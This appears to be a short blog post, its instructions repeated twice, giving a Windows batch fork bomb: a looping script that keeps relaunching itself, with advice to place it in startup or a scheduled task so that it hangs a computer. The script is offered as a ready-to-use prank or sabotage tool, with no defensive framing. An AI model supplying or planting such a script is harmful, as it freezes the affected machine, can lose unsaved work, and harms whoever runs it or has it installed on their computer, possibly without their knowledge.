HOW TO Hang a Laptop or Computer
Open notepad and copy below code
@echo off
:a
start %0
goto a
Save file as something.bat
Add in startup or schedule it or may be keep on desktop. This will open new command prompts every second and hang your laptop or computer
Open notepad and copy below code
@echo off
:a
start %0
goto a
Save file as something.bat
Add in startup or schedule it or may be keep on desktop. This will open new command prompts every second and hang your laptop or computer
No comments:
Post a Comment